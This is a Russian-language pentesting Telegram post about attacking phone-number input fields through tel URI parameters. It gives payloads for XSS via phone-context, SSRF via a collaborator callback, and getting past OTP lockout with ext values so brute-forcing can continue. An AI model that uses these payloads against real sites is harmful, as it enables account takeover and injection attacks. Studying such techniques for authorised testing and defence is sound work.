TGViewer
Что-то на пентестерском Что-то на пентестерском @pntests · 2.78K subscribers
Post #106 2.63K
⛈ Атаки на механизм ввода номера телефона

Привет! Давай разберемся как найти уязвимости в форме ввода телефона.
Согласно RFC 5341 URI номера телефона может иметь параметры, которые нужны для передачи более точных данных
Чаще всего параметры принимают почтовые сервисы либо веб-приложения в которых отсутствует жесткая валидация номеров.

🟩Пример: параметр phone-context может использоваться для определения того, какой код страны(+7,+1) используется. Если ты зашел на сайт и определился твой город, то при регистрации вводя свой номер телефона, ты можешь вписать свой номер без кода страны т.к. он может подставится в параметр.

🟩Атаки используя параметры:
✅ XSS
+88005553535;phone-context=<script>alert(1)</script>
// Следует поставить в query string параметр в который помещен номер

✅ SSRF
+88005553535;phone-context=burpcollab
// Работает редко, в основном в старых системах

✅ OTP Обход блокировки
+88005553535;ext=0
+88005553535;ext=2
+88005553535;ext=3
// Если заблокировали то подставляем ext с цифрой и продолжаем брутить с того кода, с которого залочили

📌 Более подробно изучить можно тут:
📶 HackTricks

ЧТНП | #web
  • 🔥 18
  • 👍 3
  • ❤ 2
More from @pntests
  1. Dec 31, 2025С новым годом 🎉🎊🎆🍾🎄🎁
  2. Aug 10, 2025James Kettle дропнул свой ресерч про новые классы атак через HTTP Request Smuggling и, к м…
  3. Jul 14, 2025🛡 Application Attack Matrix — созданная сообществом MITRE-подобная матрица тактик, техник…
  4. Jun 18, 2025Успейте подать заявку на Pentest Award 2025 до 30 июня! Это отраслевая награда для специал…
  5. Jun 8, 2025Post #191
  6. Jun 8, 2025⛈Небезопасная генерация токена Что может быть проще: сброс пароля, подтверждение почты или…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →